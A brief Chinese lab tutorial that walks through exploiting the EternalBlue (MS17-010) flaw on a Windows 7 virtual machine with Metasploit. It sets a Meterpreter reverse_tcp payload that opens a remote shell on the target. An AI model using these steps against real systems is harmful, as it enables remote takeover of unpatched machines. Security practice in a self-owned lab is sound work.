条件:利用漏洞
2017年暴露出来的漏洞,win10早期版本、win7、及之有的版本都存在这个漏洞。
测试永恒之蓝漏洞:
- 首先去官网下载win7的镜像下载windows官方镜像源,然后再装在虚拟机上
- msfconsole 命令启动msf
- search ms17_010 命令搜索永恒之蓝漏洞(ms17_010: 微软17年第010号漏洞)
- use exploit/windows/smb/ms17_010_eternalblue 命令,使用上一步找到的模块名称0
- show options 命令查看配置必选项
- set 命令,设置上一步的必选项
exploit 是漏洞攻击脚本(包含payload,为payload起到推动作用);
payload 是攻击载荷(真正起作用的东西)
set RHOSTS 192.168.43.128 #设置攻击目标的地址
set payload windows/x64/meterpreter/reverse_tcp #设置payload(复制默认的)
- set lport 6000 命令修改payload(攻击机的端口),如果不使用默认端口
- show options 命令再次查看有没有配置完成(之前显示yes的地方为空白,现在是否有了刚才设置的内容)
- run 命令直接运行
- 攻击完成,得到一个meterpreter命令行,在该命令行中输入的命令相当于在目标机上输入命令(我们输入help命令得到很多命令,只要有权限,这些命令都会在目标机上执行)